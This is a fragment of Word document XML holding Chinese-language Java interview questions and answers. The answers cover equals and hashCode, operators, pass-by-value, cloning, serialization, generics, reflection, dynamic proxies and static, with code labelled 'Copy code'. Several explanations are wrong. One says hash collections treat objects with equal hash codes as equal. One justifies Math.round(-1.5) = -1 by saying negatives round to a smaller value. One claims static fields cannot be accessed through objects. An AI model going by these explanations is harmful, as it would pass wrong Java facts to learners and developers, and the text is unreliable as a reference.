        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对于基本数据类型，"=="比较的是它们的值是否相等，而对于引用数据类型，"=="比较的是它们的地址是否相等。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vbnetCopy codeString str1 = new String("hello");</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String str2 = new String("hello");</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System.out.println(str1 == str2); // false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System.out.println(str1.equals(str2)); // true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在上面的代码中，"=="比较的是str1和str2的地址是否相同，因为str1和str2是两个不同的对象，所以返回false。而"equals"比较的是str1和str2的值是否相等，因为它们的值都是"hello"，所以返回true。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综上所述，"=="比较的是变量的引用是否指向同一个对象，而"equals"比较的是两个对象的内容是否相同。在使用时需要根据实际情况选择适当的比较方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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两个对象的 hashCode() 相同，则 equals() 也一定为 true 吗？</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不一定。</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hashCode() 方法是Object类中的一个方法，用于获取对象的哈希码值，这个哈希码值可以用于在散列表等数据结构中进行快速查找和比较。equals()方法也是Object类中的一个方法，用于比较两个对象是否相等。在Java中，如果两个对象的equals()方法返回true，则它们的哈希码值（hashCode()）必须相同；但是，如果两个对象的哈希码值相同，它们的equals()方法不一定返回tru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是因为，哈希码值相同只能说明这两个对象所处的哈希桶相同，但不一定表示它们相等。因为哈希冲突是不可避免的，可能会有多个不同的对象具有相同的哈希码值。在这种情况下，equals()方法会进一步比较它们的属性值是否相等，以确定它们是否相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class Person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private String name;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private int age;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Person(String name, int age)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this.name = name;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this.age = age;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@Override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int hashCode()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Objects.hash(name, age);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@Override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boolean equals(Object obj)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if (obj == this)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true;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if (!(obj instanceof Person))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false;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Person p = (Person) obj;</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Objects.equals(this.name, p.name) &amp;&amp; this.age == p.age;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class Test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static void main(String[] args)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Person p1 = new Person("Tom", 20);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Person p2 = new Person("Tom", 20);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System.out.println(p1.hashCode());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System.out.println(p2.hashCode());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System.out.println(p1.equals(p2)); // true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上面的例子中，虽然p1和p2是两个不同的对象，但是它们的属性值相同，因此它们的equals()方法返回true。同时，由于它们的属性值相同，它们的hashCode()方法也返回了相同的哈希码值。因此，如果两个对象的hashCode()方法返回相同的哈希码值，它们的equals()方法有可能返回true，但这并不是绝对的，还需要进一步比较它们的属性值是否相等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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为什么重写 equals() 就一定要重写 hashCode() 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对象的hashCode()方法返回一个整数，用于表示该对象的哈希码。哈希码是根据对象的内部状态（例如对象的属性值）计算得出的一个数值。hashCode()方法是Object类的一个方法，因此所有Java对象都具有hashCode()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ashCode()方法的作用是为了让这个对象能够被放入到哈希表等基于哈希算法的数据结构中，从而提高查找效率。例如，当我们使用HashMap、HashSet等集合类时，它们都是基于哈希表实现的。在这些集合中，如果两个对象的hashCode()值相等，它们会被认为是相等的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如果我们重写了一个类的equals()方法，就应该同时重写hashCode()方法，以确保相等的对象具有相同的哈希码。如果不重写hashCode()方法，可能会导致哈希表等数据结构无法正常工作，例如当我们把对象添加到HashSet集合中时，可能会出现不正确的结果，即HashSet中可能会出现相等的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另外，根据Java规范，在重写equals()方法时，必须满足以下要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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自反性：对于任何非空引用x，x.equals(x)必须返回true。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对称性：对于任何非空引用x和y，如果x.equals(y)返回true，那么y.equals(x)也必须返回true。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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传递性：对于任何非空引用x、y和z，如果x.equals(y)返回true，并且y.equals(z)也返回true，那么x.equals(z)也必须返回true。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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一致性：对于任何非空引用x和y，多次调用x.equals(y)始终返回true或false，前提是x和y的比较条件没有改变。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对于任何非空引用x，x.equals(null)必须返回false。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重写hashCode()方法时，我们也需要满足这些要求，以保证在使用哈希表等数据结构时能够正确地进行比较和查找。因此，如果我们重写了equals()方法，就应该同时重写hashCode()方法，并保证这两个方法的实现满足这些要求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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&amp; 和 &amp;&amp;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&amp;和&amp;&amp;都是Java中的逻辑运算符，它们的区别在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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&amp;是按位与运算符，它对两个操作数的每一位执行逻辑与操作。当两个操作数都为true时，它的结果为true；否则为false。无论第一个操作数的值是什么，第二个操作数都会被计算。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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&amp;&amp;是逻辑与运算符，它只有在第一个操作数为true时才计算第二个操作数的值。如果第一个操作数为false，那么第二个操作数不会被计算，直接返回false。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简单来说，&amp;是按位与运算符，无论第一个操作数的值是什么，都会计算第二个操作数的值。而&amp;&amp;是逻辑与运算符，只有在第一个操作数为true时才会计算第二个操作数的值，从而可以提高程序的效率。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另外需要注意的是，对于boolean类型的操作数，&amp;和&amp;&amp;的结果是相同的。因此，在处理boolean类型的数据时，通常应该使用&amp;&amp;而不是&amp;，以提高程序的效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中的参数传递时传值呢？还是传引用？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在Java中，参数传递时是按值传递（pass by value），也就是说，方法接收到的是参数值的一个副本，而不是参数本身。这意味着，在方法内部对参数值的任何修改都不会影响到方法外部原始参数的值。</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然而，在Java中，对于对象类型的参数，方法接收到的是对象引用的一个副本，而不是对象本身。这个对象引用指向的是在堆内存中分配的实际对象。因此，在方法内部对对象的任何修改都会影响到实际对象，并且这些修改在方法外部也是可见的。这可能会导致一些人误认为Java是按引用传递的，但实际上Java还是按值传递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更好地理解这个问题，可以将对象引用看作是一个地址，而实际对象则是保存在该地址指向的内存单元中的数据。当我们将一个对象引用作为参数传递给方法时，方法接收到的是这个地址的副本。因此，虽然方法内部的代码可以通过这个地址来修改实际对象的数据，但是方法外部的代码并没有修改这个地址，因此原始对象的引用仍然指向同一个内存单元。</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综上所述，Java中的参数传递是按值传递的，对于对象类型的参数，实际上是传递了对象引用的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中的 Math.round(-1.5) 等于多少？</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在Java中，Math.round(-1.5)的结果为-1。</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Math.round()是一个四舍五入方法，它将一个浮点数四舍五入为最接近的整数。如果参数是正数，则四舍五入的结果为最接近的整数，如果参数是负数，则四舍五入的结果为最接近的整数并且小于原数。</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因此，在这个例子中，-1.5会被四舍五入为-1，而不是0或-2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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如何实现对象的克隆？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在Java中，有两种方式可以实现对象的克隆：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使用Cloneable接口和clone()方法Cloneable接口是一个标记接口，表示该类可以被克隆。在实现类中，需要重写Object类中的clone()方法，并且在方法中调用super.clone()方法，以便创建对象的副本。注意，clone()方法返回的是一个Object类型的对象，需要将其强制转换为实际的类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例如，以下是实现Cloneable接口的示例代码：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javaCopy codepublic class MyClass implements Cloneable {private int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MyClass(int value)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this.value =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void setValue(int value)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this.value =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int getValue()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@Override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Object clone() throws CloneNotSupportedException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super.clone();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}可以使用以下方式来创建对象的克隆：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vbnetCopy codeMyClass obj1 = new MyClass(10);MyClass obj2 = (MyClass) obj1.clone();使用序列化和反序列化Java中的序列化和反序列化可以将对象转换为字节流并重新创建对象。因此，可以使用这种方法来实现对象的克隆。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以下是使用序列化和反序列化实现对象克隆的示例代码：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javaCopy codeimport java.io.*;</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public class MyClass implements Serializable {private int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MyClass(int value)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this.value =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void setValue(int value)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this.value =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int getValue()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value;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MyClass clone()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MyClass obj = null;</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try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ByteArrayOutputStream bos = new ByteArrayOutputStream();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ObjectOutputStream oos = new ObjectOutputStream(bos);</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oos.writeObject(this);</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oos.flush();</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oos.close();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bos.close();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ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());</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ObjectInputStream ois = new ObjectInputStream(bis);</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obj = (MyClass) ois.readObject();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ois.close();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bis.close();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 catch (Exception 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e.printStackTrace();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obj;</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}可以使用以下方式来创建对象的克隆：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vbnetCopy codeMyClass obj1 = new MyClass(10);MyClass obj2 = obj1.clone();需要注意的是，无论哪种方式实现对象克隆，都需要确保克隆的对象是独立的，即克隆对象的修改不会影响原始对象。在实现克隆方法时，需要注意保护实例变量的封装性，确保只有克隆对象本身可以访问它们。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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深克隆和浅克隆的区别？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深克隆和浅克隆都是克隆对象的方式，但它们的区别在于克隆的程度不同。简单来说，深克隆会复制所有对象的属性和子对象，而浅克隆只会复制对象本身和对象的基本属性，而不会复制对象的子对象。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来说，深克隆会创建一个全新的对象，然后将原对象的所有属性和子对象递归地复制到新对象中，也就是说，新对象和原对象是完全独立的。而浅克隆只会创建一个新对象，然后将原对象的基本属性复制到新对象中，但是对于子对象，则只是将引用复制到新对象中，而不是真正的复制，因此新对象和原对象的子对象共享同一个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举个例子，假设有一个Person类，其中包含一个Address对象，现在要对这个Person对象进行克隆。如果使用深克隆，会创建一个新的Person对象，并递归地复制其属性和子对象，包括Address对象；而如果使用浅克隆，则只会创建一个新的Person对象，并复制其基本属性，例如姓名、年龄等，但是对于Address对象，则只是将其引用复制到新对象中，新对象和原对象的Address对象是共享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深克隆和浅克隆都有自己的优缺点，需要根据具体情况来选择使用哪种方式。深克隆可以完全复制对象和其子对象，使得新对象和原对象相互独立，但是可能会耗费更多的时间和内存。而浅克隆则更加高效，但是可能会带来一些副作用，例如修改新对象的子对象可能会影响原对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 Java 的序列化，如何实现 Java 的序列化？</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java的序列化是指将Java对象转换成二进制数据，以便在网络上传输或保存到磁盘上，这个过程叫做序列化。反序列化是指将这些二进制数据转换成Java对象。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的序列化机制需要实现Serializable接口，这个接口没有任何方法，只是起到一个标记作用，表示这个类可以进行序列化。实现了Serializable接口的类中，可以将需要序列化的成员变量标记为transient关键字，这样在进行序列化时，这个变量就不会被序列化。</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提供了两种序列化方式：基于对象的序列化和基于字节流的序列化。基于对象的序列化是指将一个对象序列化为一个字节数组，再将这个字节数组写入到文件或通过网络传输给其他程序。基于字节流的序列化是指将对象的属性一个一个写入输出流，每个属性都包含一个属性名和属性值。</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实现Java的序列化，可以按照以下步骤进行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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创建一个实现Serializable接口的Java类。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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通过ObjectOutputStream将Java对象转换成字节数组，或者通过ObjectInputStream将字节数组反序列化成Java对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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如果需要对序列化的对象进行自定义处理，可以重写writeObject()和readObject()方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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如果需要保证序列化后的对象版本兼容性，可以使用serialVersionUID来指定版本号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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什么情况下需要序列化？</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在以下情况下需要进行Java对象的序列化：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对象需要在网络中进行传输：在分布式应用程序中，可以将Java对象序列化并通过网络传输给远程应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对象需要被持久化：Java对象可以被序列化并存储在磁盘上，以便在需要时可以重新加载。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对象需要被缓存：Java对象可以被序列化并缓存在内存中，以提高程序的性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对象需要进行深度复制：在某些情况下，需要创建对象的副本，这时可以通过将对象序列化然后反序列化的方式实现深度复制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对象需要在进程之间共享：在Java应用程序中，可以将Java对象序列化并通过消息队列或共享内存等方式共享给不同的进程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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的泛型是如何工作的 ? 什么是类型擦除 ?</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Java泛型是一种强类型机制，它提供了类型安全的编程，可以在编译时检测类型错误，避免在运行时出现类型错误。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Java的泛型是通过类型擦除（Type Erasure）实现的。类型擦除是指在编译时期将所有的泛型信息擦除，并将泛型类型替换为原始类型或者限定类型，以便可以像处理普通对象一样处理泛型类型。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来说，Java编译器会将泛型类型的代码编译成普通的类或者方法，其中所有的泛型类型都会被替换成其限定类型或者Object类型。例如，一个泛型类List&lt;T&gt;在编译后会变成一个普通的List类，其中所有的T都会被替换成Object类型。在需要类型检查的地方，编译器会自动生成强制类型转换代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类型擦除的实现方式带来了一些限制和问题，例如无法获取泛型的实际类型参数，无法使用基本类型作为类型参数等。但是，类型擦除也使得Java的泛型可以与旧版本的Java代码兼容，同时也降低了Java虚拟机的实现难度和开销。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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什么是泛型中的限定通配符和非限定通配符 ?</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在Java的泛型中，通配符（Wildcard）指的是使用“?”来表示的一种特殊类型。通配符可以用来表示某个类型的子类或父类，或者表示任意类型。通配符分为限定通配符和非限定通配符两种。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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非限定通配符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非限定通配符（Unbounded Wildcard）用“?”来表示，可以表示任意类型。使用非限定通配符的语法格式为：</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swiftCopy codeList&lt;?&gt; list = new ArrayList&lt;&gt;();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里的“?”表示可以接受任意类型的元素，但是不能添加元素，因为无法确定要添加的元素类型是否符合集合类型的定义。非限定通配符一般用于方法的参数类型和返回值类型，表示该方法可以接受任意类型的参数或返回任意类型的结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2.限定通配符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限定通配符（Bounded Wildcard）用“? extends”和“? super”来表示，分别表示只能接受某个类型及其子类型，或者只能接受某个类型及其父类型。使用限定通配符的语法格式为：</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javascriptCopy codeList&lt;? extends Number&gt; list1 = new ArrayList&lt;&gt;();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List&lt;? super Integer&gt; list2 = new ArrayList&lt;&gt;();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这里的“? extends Number”表示可以接受Number及其子类类型的元素，而“? super Integer”表示可以接受Integer及其父类类型的元素。使用限定通配符可以让集合接受更广泛的元素类型，使得集合具有更大的灵活性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中的反射是什么意思？有哪些应用场景？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中，反射（Reflection）指的是在程序运行时动态地获取对象的信息和操作对象的属性、方法等功能。通过反射，可以在运行时检查和操作对象的属性、方法和构造函数，以及动态地创建、实例化、操作类和对象。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反射常用于以下场景：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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动态加载类：可以在运行时根据需要动态地加载类，而不必在编译时就把所有需要用到的类都加载进来。这样可以提高程序的灵活性和扩展性，尤其在插件化开发中应用广泛。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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通过反射获取类的信息：可以在运行时获取类的名称、包名、父类、实现的接口、构造函数、属性和方法等信息，并根据这些信息进行相应的操作，如创建对象、调用方法等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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动态代理：通过反射可以动态地创建代理类和代理对象，实现对目标对象的动态代理和调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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对象的序列化和反序列化：通过反射可以获取对象的属性和方法，进而对对象进行序列化和反序列化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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框架开发：许多框架都使用反射来实现某些功能，如 Spring 框架中的依赖注入和 AOP 编程等。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74151"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="F7F7F8"/>
        </w:rPr>
        <w:t>总的来说，反射使得 Java 程序具有更高的灵活性和扩展性，但也会对性能造成一定的影响，因此在使用反射时需要权衡利弊，避免滥用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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反射的优缺点？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反射是Java中的一个重要特性，它允许程序在运行时动态地加载、探测和使用类，获取类信息并调用类的方法、访问和修改类的属性。反射提供了一种在运行时操作对象的能力，使得程序的灵活性和扩展性得到了提高。然而，反射也有一些优点和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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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动态性：反射可以在运行时动态地加载和使用类，不需要在编译时就确定类的类型。这使得程序的灵活性得到了提高，可以更加方便地实现插件化、动态代理等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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可扩展性：反射允许程序在运行时动态地创建和使用对象，可以实现一些需要在运行时动态生成对象的场景，比如对象池、工厂模式等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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逆向工程：反射允许程序获取类的信息，包括类的方法、属性、注解等，可以实现一些逆向工程的功能，比如自动生成代码、序列化等。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缺点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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性能问题：使用反射会降低程序的性能，因为反射涉及到动态生成类、动态绑定方法等操作，需要消耗更多的时间和内存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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安全问题：反射可以绕过Java的访问权限限制，可以访问和修改类的私有属性和方法，这可能会导致安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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代码可读性降低：使用反射会让代码变得更加复杂，降低代码的可读性和可维护性。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在使用反射时需要权衡其优缺点，选择合适的场景和方式。通常情况下，只有在需要在运行时动态生成和使用对象，或者需要逆向工程等场景下才需要使用反射，而在其他情况下应该避免使用反射，以提高程序的性能和可维护性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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中的动态代理是什么？有哪些应用？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中的动态代理是一种机制，它允许您在运行时生成代理对象，而无需手动编写代理类的代码。动态代理是通过在运行时创建一个实现特定接口的代理对象来实现的。在运行时，代理对象将方法调用转发给指定的委托对象，并可以在调用之前或之后执行其他操作，例如记录日志、计时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动态代理可以应用于各种场景，包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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远程服务调用：可以使用动态代理来调用远程服务，将远程服务的接口与其实现分离开来，使客户端代码更加简洁，同时也更容易维护和扩展。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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AOP（面向切面编程）：可以使用动态代理来实现AOP，通过在方法调用前后执行一些通用的代码，例如日志记录、事务管理等，从而将横切关注点与业务逻辑分离开来。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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动态代理工厂：可以使用动态代理来创建一组代理对象，这些对象实现了同一个接口，并且将方法调用转发给不同的实现对象，从而实现一种基于策略的动态代理。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总之，动态代理是Java中非常有用的一种机制，可以大大简化某些场景下的编程任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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怎么实现动态代理？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在Java中，动态代理是通过java.lang.reflect.Proxy类来实现的。下面是一个简单的示例：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javaCopy codepublic interface MyInterface {void myMethod();}</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public class MyRealObject implements MyInterface {public void myMethod() {System.out.println("MyRealObject.myMethod() called");}}</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public class MyInvocationHandler implements InvocationHandler {private Object realObject;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MyInvocationHandler(Object realObject)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this.realObject = realObject;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Object invoke(Object proxy, Method method, Object[] args) throws Throwable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System.out.println("Before calling " + method.getName());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Object result = method.invoke(realObject, args);</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System.out.println("After calling " + method.getName());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result;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public class Main {public static void main(String[] args) {MyInterface realObject = new MyRealObject();MyInvocationHandler invocationHandler = new MyInvocationHandler(realObject);MyInterface proxy = (MyInterface) Proxy.newProxyInstance(realObject.getClass().getClassLoader(),new Class[] { MyInterface.class },invocationHandler);proxy.myMethod();}}在这个示例中，MyInterface是要被代理的接口，MyRealObject是接口的实现类，MyInvocationHandler是实现了InvocationHandler接口的代理处理类。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Main类中，我们首先创建了一个实现了MyInterface接口的MyRealObject对象。接着，我们创建了一个MyInvocationHandler对象，并将实际对象传递给它。最后，我们使用Proxy.newProxyInstance方法创建代理对象，该方法接受三个参数：</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类加载器实现的接口代理处理程序当我们调用代理对象的myMethod方法时，代理对象会将调用转发给实际对象，并在调用前后执行代理处理程序中的代码。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这就是动态代理的基本原理。实际上，我们可以使用动态代理来代理任何接口，并在代理处理程序中执行任何代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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static 关键字的作用？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static 是Java语言中的一个关键字，用于声明静态成员变量和静态方法。静态成员变量和静态方法属于类，而不是属于对象。它们在类被加载时初始化，而不是在对象被创建时初始化。因此，它们可以在任何对象之间共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静态成员变量可以用来存储类级别的常量或状态，例如全局计数器。静态方法通常用来执行类级别的操作，例如工具方法。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以下是一些静态成员变量和静态方法的例子：</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class MyClass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静态成员变量</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static final double PI = 3.1415926;</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static int count = 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静态方法</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static void incrementCount()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count++;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static int getCount()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count;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}在上面的例子中，PI是一个静态常量，count是一个静态变量，incrementCount()和getCount()是静态方法。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使用静态成员变量和静态方法时需要注意一些事项：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静态成员变量可以在类级别上访问，但不能在对象级别上访问。静态方法不能访问非静态成员变量或非静态方法。静态成员变量和静态方法可以通过类名直接访问，不需要创建对象。静态方法不能被子类覆盖，但可以被重载。静态代码块在类被加载时执行，可以用于初始化静态成员变量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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super 关键字的作用？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Style w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
